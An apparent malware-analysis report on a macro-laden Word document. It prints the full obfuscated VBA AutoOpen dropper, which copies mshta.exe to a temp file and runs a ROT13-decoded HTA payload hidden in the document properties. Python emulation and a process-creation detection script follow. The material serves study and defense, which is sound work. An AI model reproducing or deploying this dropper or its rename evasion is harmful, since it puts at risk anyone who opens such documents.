Verdict: MALICIOUS
Risk score: 138
Heuristics: 6

Findings

- ClamAV detection (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.87e88716f38ff820-OOXML-9981520-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): the document contains a VBA project; VBA macros are present.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched line in script:
    Call CreateObject("ws" + abWLx + "ell").run(aVOhvn)
  The ProgID is assembled at runtime from "ws", the constant abWLx ("cript.sh") and "ell", i.e. WScript.Shell, so a plain string match on "WScript.Shell" in the source would not fire.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script:
    Sub AutoOpen()
  Runs as soon as the document is opened with macros enabled and calls aOHif, which carries out the whole chain (file copy, payload write, execution).
- Environ() call (low, OLE_VBA_ENVIRON). Matched line in script:
    afeyp4 = Environ(a5rab3)
  Used to resolve the windir and temp environment variables, which the macro needs to locate mshta.exe and to choose its drop directory.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it. Every URL below was found in document text (OOXML body / shared strings), and all of them are XML namespace identifiers: OOXML and Office extension schemas (schemas.microsoft.com, schemas.openxmlformats.org) plus an XMP / Dublin Core metadata packet (ns.adobe.com, purl.org, w3.org) of the kind carried by an embedded image. None is contacted at runtime and none is referenced by the macro. The extracted macro itself contains no URL and no network call; the "Downloader" in the ClamAV name describes the next stage, which the macro decodes from the document's Category property and hands to mshta, and whose content this report does not show.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2018/wordml/cex
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2018/wordml
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
  - http://ns.adobe.com/xap/1.0/
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8750 bytes | 50ced68c8a96d82d42c9232bbcd535d70574783560726fd7e7a873dd73c6353c |

Preview of macros.bas (first 1,000 lines of the extracted script, shown verbatim):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aic5CJ"
Sub AutoOpen()
' Answerable changelog transfiguration
aOHif
End Sub
Attribute VB_Name = "axPB65"
Public Const apE3q As String = ""
Public Const aH8xm As Integer = 16445 / 1265
Public Const aRZcb As String = "1ridn1iw1"
Public Const aFtIw As String = "231met1sys1"
Public Const ahAkM As String = "p1m1e1t"
Public Const abWLx As String = "cript.sh"
Function aOgZf()
' Blizzard transcripts stepdaughter
End Function
Sub abh0Rg(ayobI)
' Freeware specify floors
' Ultimatum georgie plaid tubular
' Lengthen
' Pungent medline
' Conscript botswana chloe fetus
' Excess
' Maynt conclude registration marks column cl
' Gad sydney notified remark flimsy rock
' Gibson shred
' Wound diesel project
' Largest indoor
' Coolie dancing acutely gut
' Capillary transcripts
' Scurry occupant quilt
' Cornell
' Reid clinton
' Centaur invitations rand corroborate terminology
' Humanitarian tarnish
' Love-making pants arrival
' Favourites stations
' Enabled apocryphal tarried dd
' Remorseless ver misuse
' Interstate verdant accounts leather
' Pensions teas paper lookup
End Sub
Function a7A5mZ(aYKmU)
' Electoral tomatoes prevention fairy
' Rubicon belfast
' Roumania laggard
' Shewn memorabilia chute
' Mia florin
' Cherub
' Dannie
' Gcc laymen ambien hot unrestrained
' Company configuration pty crowbar
' Scythe
' Importune
' Ferrara diameter stewed
a7A5mZ = ActiveDocument.BuiltInDocumentProperties(aYKmU)
End Function
Public Sub aUu1c()
' Alternatively cordova chauffeur
azUoNF
End Sub
Public Sub adHaP()
aPENSZ
End Sub
Attribute VB_Name = "alWwTK"
Public Function a6dgm(ar7Szd, acerN)
' Bated topless
' Bankrupt chairman cameras virtue
' Discussion webcams
' Julia gazette
' Unbalanced loves efficient findings
' Macintosh coasted candor helpful queries
' Measurement student bevis opposite
' Earthen speaker miami forge default
' Influence hu
' Basis dylan subjugate rating goodbye torpid
' Retained charges
' Rebate repudiated
' Preliminary lutheran constituting
' Aud soil wang quantitative mali
' Prisoners Word cop
' Ground patrician inscrutable
' Shingle ce chuck valparaiso
' Eater broadside nave profession
' Devotedness stupefaction ninety-two applaud
' Suggestions sift publish
' Contracts episodes wrote
' Yield liberals provencal roads
FileNumber = FreeFile
Open ar7Szd For Output As #FileNumber
Print #FileNumber, acerN
Close #FileNumber
End Function
Sub aHw7d(aS3y1x, aArxj)
' Disabled
' Concierge hepatitis
' Meteoric chapel spellbound voiceless
' Tapers
' Licensed beginner twitch masonic
' Phil yawl
' Carb economically ethereal fourth quondam
' Specialist intention plan clematis
' Jerkin midway frustrate earliest inflated
' Oc providence waning urban bryan
' Catechism gallery
' Mother-of-pearl dyou
' Wheat
' Paul patterns gifts enquiry art
' Football rom gates
' Quince retro bishopric abatement garlic
' Honduras herodotus dominica johannes creates rhapsody
' Capitol
' Cone mobility textbook cold-blooded
' Warm gratis wonder varied
' Settle deserter tilt levity
' Cower query hypocritical
' Surely convenience colonial
' Ascii wrench diablo
' Broadest saved encryption washington reflection
' Doff jenny legislative pronunciation
' Outstanding antigua forty-two gland
' Dissemble wayward elapse biological
' Graph gnome fewest ambergris disable thrash
' Ba secretive pertain conch mediocrity
' Flagrant firstly
' Aurora factotum bruges muff
' Margarita fighters yearling recovery
' Equip effusive
' Assassins kit
FileCopy aS3y1x, aArxj
End Sub
Function aUC96B(aNJM1A)
' Null arrived
aUC96B = aNJM1A
End Function
Function adGbP(aNJM1A) As String
Dim aYrRzA As Long
Dim apIrW As Integer
Dim a19fKw As Integer
For aYrRzA = 1 To Len(aNJM1A)
' Artemis cycles vhs promoted
a19fKw = 0
' Lustily questionnaire
a78Sq = Mid(aNJM1A, aYrRzA, 1)
' Joe flop viper chunk
apIrW = Asc(a78Sq)
' Granddaughter messaging viewer
' Unfriendly functions
' Switching configuration hayes cultural
' Studious answer broken
' Stopped witnesses unpremeditated obsession scroll deny
' Gaudy telecom prodigy
' Convocation parallel
' Mpg brewed
' Hull elections stilled
' Registration studio
' Ec all-embracing
If (apIrW > ah7ovz(30208 / 30208) And apIrW < ah7ovz(32164 / 16082)) Or (apIrW > ah7ovz(6382 - 6379) And apIrW < ah7ovz(27316 / 6829)) Then
a19fKw = aH8xm
' Custom cope returns
' Aloofness catholic including groove
' Sudan tripoli
' Knead drier
' Honest falter gorse hypnotism
' Bet elucidation magnify waterproof endorsement
' Diphtheria
' Instrumental maintaining
' Interaction
' Inverse
' Ericsson samaria
apIrW = aucpr(apIrW, a19fKw)
If apIrW < ah7ovz(5) And apIrW > 83 Then
apIrW = adeKx(apIrW)
ElseIf apIrW < 28990 / 446 Then
apIrW = adeKx(apIrW)
End If
End If
aXC0E = acIr6(apIrW)
Mid$(aNJM1A, aYrRzA, 1) = aUC96B(aXC0E)
Next aYrRzA
adGbP = aNJM1A
End Function
Attribute VB_Name = "a5uhVb"
Function a20NBn(aSMOn)
' Geraldine msn burner schooling conducted
aso3BJ = aSMOn
asr8Oe = Len(aso3BJ)
For aYWGIm = 0 To asr8Oe - 1
' Fussy
' Hard queue coerced offal
' Coding
' Chaldean shopkeeper rpm
' Monty closes typically depend
' Means shingles
' Signed testing pr suzanne
' Pessimistic respect broomstick
' Outline nitrogen belly
' Possibility batteries sleeve
' Tacks trooper filipino vibrating cancer
' Eradicate lucerne mastiff incentive
' Lap readers erotic
' Anomaly paganism belt
' Ns apace
' Respond
' Ribald
' Draft authentication chrome right yawn
' Jointed inches emergency
' Roll onlooker adorer
' Worst feelings claim trustees iceland
a1dWoc = a1dWoc & Mid(aso3BJ, (asr8Oe - aYWGIm), 1)
Next aYWGIm
a20NBn = a1dWoc
End Function
Public Function aOMv0(a0bodD)
aOMv0 = Replace(a0bodD, apE3q, "")
End Function
Sub aOHif()
aUu1c
' Seventy-two queue accent madagascar closeted
' Functioning prepare encumber incubation roe nudist
' Performer
' Examine instructors
' Madhouse
' Perverted suave
' Rover marbles alpha
' Surf espn
' Criteria
' Lists bribery plash
' Cited exasperate eyesight hemlock earliest beatles
adHaP
Call CreateObject("ws" + abWLx + "ell").run(aVOhvn)
End Sub
Attribute VB_Name = "ab9WVe"
Function afeyp4(a5rab3)
afeyp4 = Environ(a5rab3)
End Function
Function aLk0KI()
With Application
aLk0KI = .PathSeparator
End With
End Function
Function afbry(aiEyT)
' Primarily cocks
ayI1o8 = VBA.Split(a20NBn("lmth.ni|moc.ni|exe.athsm"), "|")
' Prostores navigable centurion
' Respected
' Demoniacal hours discursive rhinoceros cocktail bool
' Infirmity
' Brandenburg intrepidity insincere enquiry
' Harassment complacency
' Wetting unbelievable angeles sever portugal displace
' Negligible preposition conservatory
' Increases
' Syrup
' Phlegmatic weal cosy tick papal
' Latin puerile renewable bars induction recruited
' Manhattan sponsors producers
' Intercept centuries kennels
Select Case aiEyT
Case 0:
afbry = afeyp4(Replace(a20NBn(aRZcb), "1", "")) & aLk0KI & Replace(a20NBn(aFtIw), "1", "") & aLk0KI & ayI1o8(0)
' Catalog
Case 1:
' Franchise planes malpractice ailing rugs
afbry = afeyp4(Replace(a20NBn(ahAkM), "1", "")) & aLk0KI & ayI1o8(1)
' Star hello
Case 2:
afbry = afeyp4(Replace(a20NBn(ahAkM), "1", "")) & aLk0KI & ayI1o8(2)
End Select
End Function
Sub aPENSZ()
aEdFx = aMVtL(afbry(2))
a6dgm aEdFx, adGbP(a7A5mZ("category"))
End Sub
Attribute VB_Name = "agqXKM"
Function apfh4R(anr5ej)
apfh4R = (aOMv0(anr5ej))
End Function
Function a0FDgf(aGOKqk)
a0FDgf = (aOMv0(aGOKqk))
End Function
Function aMVtL(aqUf2)
aMVtL = (aOMv0(aqUf2))
End Function
Function aVOhvn()
aObjq = a0FDgf(afbry(1))
aJvHOa = aMVtL(afbry(2))
aVOhvn = aObjq & " " & aJvHOa
End Function
Attribute VB_Name = "aVQoGT"
Sub azUoNF()
aCacS = apfh4R(afbry(0))
aLXGo = a0FDgf(afbry(1))
aHw7d aCacS, aLXGo
End Sub
Function adeKx(aBcUG)
adeKx = aBcUG + 23010 / 885
End Function
Function ah7ovz(aSp34M)
If aSp34M = 0 Then
ah7ovz = 28824 - 28823
ElseIf aSp34M = 1 Then
ah7ovz = 10624 / 166
ElseIf aSp34M = 2 Then
ah7ovz = -59 + 150
ElseIf aSp34M = 3 Then
ah7ovz = 115 - 19
ElseIf aSp34M = 4 Then
ah7ovz = -16 + 139
ElseIf aSp34M = 5 Then
ah7ovz = 182 - 85
Else
ah7ovz = 1024 * 1
End If
End Function
Function aucpr(aBcUG, auQ3PD)
aucpr = aBcUG - auQ3PD
End Function
Function acIr6(aBcUG)
acIr6 = VBA.ChrW(aBcUG)
End Function
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 43008 bytes | d418c194dbce05ec67ad6d32f113340f36f7b1d325b4304bd77a910d66964fe2 |
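The Python below is added here as an analysis aid; it is not part of the report and not code from the sample. It re-implements the string helpers visible in the macros.bas preview (a20NBn, the Replace(..., "1", "") stripping used in afbry, and the character decoder adGbP with its helpers ah7ovz, aucpr and adeKx) so the dropped paths and the decoding scheme can be checked without opening the document. The victim's environment variables and the content of the document's Category property are not in the report, so the block uses a constructed environment mapping and a constructed string for the decoder check.

```python
"""
Static emulation of the string helpers in macros.bas (added analysis code,
not part of the report or of the sample). Constants are copied verbatim from
the extracted macro; the environment mapping and the decoder input below are
constructed stand-ins for values only available on the victim machine.
"""
import codecs

# Constants copied verbatim from module axPB65 and from afbry.
ABWLX = "cript.sh"                      # abWLx: "ws" + abWLx + "ell"
ARZCB = "1ridn1iw1"                     # aRZcb
AFTIW = "231met1sys1"                   # aFtIw
AHAKM = "p1m1e1t"                       # ahAkM
NAME_LIST = "lmth.ni|moc.ni|exe.athsm"  # argument of a20NBn inside afbry
AH8XM = 16445 // 1265                   # aH8xm = 13 (exact division in VBA as well)


def a20nbn(s: str) -> str:
    """a20NBn: rebuild the string from its last character to its first."""
    return s[::-1]


def decode_const(s: str) -> str:
    """Replace(a20NBn(s), "1", ""): reverse, then drop the filler '1' characters."""
    return a20nbn(s).replace("1", "")


def ah7ovz(n: int) -> int:
    """ah7ovz: a lookup table written as arithmetic (28824-28823, 10624/166, ...)."""
    return {0: 1, 1: 64, 2: 91, 3: 96, 4: 123, 5: 97}.get(n, 1024)


def adgbp(s: str) -> str:
    """adGbP followed step by step: shift letters down by aH8xm (13) and wrap."""
    out = []
    for ch in s:
        c = ord(ch)
        # ah7ovz(1)..ah7ovz(4) bound the ranges A-Z (65..90) and a-z (97..122).
        if ah7ovz(1) < c < ah7ovz(2) or ah7ovz(3) < c < ah7ovz(4):
            c -= AH8XM                       # aucpr(c, aH8xm)
            if c < ah7ovz(5) and c > 83:     # fell below 'a' from a lowercase letter
                c += 23010 // 885            # adeKx: +26
            elif c < 28990 // 446:           # fell below 'A' (65) from an uppercase letter
                c += 26                      # adeKx again
        out.append(chr(c))                   # acIr6 / VBA.ChrW
    return "".join(out)


def afbry(env: dict) -> dict:
    """afbry(0), afbry(1), afbry(2) for a given environment (the Environ lookups)."""
    names = a20nbn(NAME_LIST).split("|")     # ayI1o8
    sep = "\\"                               # Application.PathSeparator on Windows
    windir = env[decode_const(ARZCB)]        # Environ("windir")
    temp = env[decode_const(AHAKM)]          # Environ("temp")
    return {
        0: windir + sep + decode_const(AFTIW) + sep + names[0],
        1: temp + sep + names[1],
        2: temp + sep + names[2],
    }


def reconstruct_chain(env: dict) -> dict:
    """What aOHif does, in order, with every obfuscated string resolved."""
    p = afbry(env)
    return {
        "copy": (p[0], p[1]),                                   # azUoNF -> aHw7d: FileCopy
        "write": ("adGbP(BuiltInDocumentProperties(\"category\"))", p[2]),  # aPENSZ -> a6dgm
        "progid": "ws" + ABWLX + "ell",                         # CreateObject(...)
        "run": p[1] + " " + p[2],                               # .run(aVOhvn)
    }


if __name__ == "__main__":
    # Constructed environment; the real values come from Environ() on the victim.
    sample_env = {"windir": r"C:\Windows", "temp": r"C:\Users\victim\AppData\Local\Temp"}
    for step, value in reconstruct_chain(sample_env).items():
        print(f"{step:7s} {value}")
    # Constructed stand-in for the Category property, to show the decoder is plain ROT13.
    encoded = codecs.encode("<html><script language=vbscript>", "rot_13")
    print(adgbp(encoded))
```

Running it resolves the chain to: FileCopy C:\Windows\system32\mshta.exe to %TEMP%\in.com; write the decoded Category property to %TEMP%\in.html; CreateObject("wscript.shell").run("%TEMP%\in.com %TEMP%\in.html"). The decoder reduces to ROT13 over ASCII letters, so once the Category value is dumped from docProps/core.xml (the cp:category element) inside the .docx zip, any ROT13 tool recovers the HTA payload that the renamed mshta copy executes.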
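Because the macro copies mshta.exe to %TEMP%\in.com before running it, a process-creation rule that matches on the image name mshta.exe misses this sample. The check below is an added example, not part of the report, that scans process-creation events for the chain the macro builds: a binary whose OriginalFileName still says MSHTA.EXE running under another name, an Office parent launching something from the user's temp directory, and mshta being handed an .html/.hta file from temp. The events are constructed to mimic a few Sysmon Event ID 1 fields (Image, OriginalFileName, CommandLine, ParentImage), not captured telemetry, and the assumption that a FileCopy'd mshta.exe keeps its OriginalFileName rests on the value coming from the PE version resource, which copying does not alter.

```python
"""
Process-creation check for the mshta-copied-to-%TEMP% chain (added example,
not part of the report). SAMPLE_EVENTS are constructed, Sysmon-EID-1-shaped
dictionaries; in practice feed parsed events with the same field names.
"""
import ntpath

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"MSHTA.EXE", "WSCRIPT.EXE", "CSCRIPT.EXE"}   # OriginalFileName values
TEMP_MARKER = "\\appdata\\local\\temp\\"


def flags_for(event: dict) -> list:
    """Return the reasons an event matches; an empty list means no match."""
    image = event.get("Image", "")
    base = ntpath.basename(image).lower()
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    orig = event.get("OriginalFileName", "").upper()
    cmd = event.get("CommandLine", "").lower()
    reasons = []
    # 1. Renamed script host: the version resource says mshta/wscript/cscript,
    #    but the file on disk has a different name (in.com in this sample).
    if orig in SCRIPT_HOSTS and base != orig.lower():
        reasons.append(f"{orig} running as {base}")
    # 2. An Office application spawning a binary that lives in the user's temp directory.
    if parent in OFFICE_PARENTS and TEMP_MARKER in image.lower():
        reasons.append(f"{parent} started {image}")
    # 3. mshta executing an .html/.hta payload from temp (in.html in this sample).
    if orig == "MSHTA.EXE" and TEMP_MARKER in cmd and (".html" in cmd or ".hta" in cmd):
        reasons.append("mshta executing a temp .html/.hta payload")
    return reasons


def scan(events) -> list:
    """Return (Image, reasons) for every event that matches at least one rule."""
    hits = []
    for e in events:
        reasons = flags_for(e)
        if reasons:
            hits.append((e.get("Image", ""), reasons))
    return hits


# Constructed events (not captured telemetry) shaped like Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    {   # the chain from this sample: Word runs the mshta copy with the decoded payload
        "Image": r"C:\Users\victim\AppData\Local\Temp\in.com",
        "OriginalFileName": "MSHTA.EXE",
        "CommandLine": r"C:\Users\victim\AppData\Local\Temp\in.com C:\Users\victim\AppData\Local\Temp\in.html",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
    {   # benign: mshta under its own name, started by the shell, payload outside temp
        "Image": r"C:\Windows\System32\mshta.exe",
        "OriginalFileName": "MSHTA.EXE",
        "CommandLine": r'C:\Windows\System32\mshta.exe "C:\Program Files\Vendor\setup.hta"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # benign: Office child that is neither a script host nor in temp
        "Image": r"C:\Windows\System32\notepad.exe",
        "OriginalFileName": "NOTEPAD.EXE",
        "CommandLine": "notepad.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    },
]

if __name__ == "__main__":
    for image, reasons in scan(SAMPLE_EVENTS):
        print(image)
        for r in reasons:
            print("   ", r)
```

Rule 1 is the one that survives the rename and carries over to other LOLBins copied under a new name; rules 2 and 3 add context specific to this chain and are what make the in.com event stand out with three reasons while the two benign events produce none.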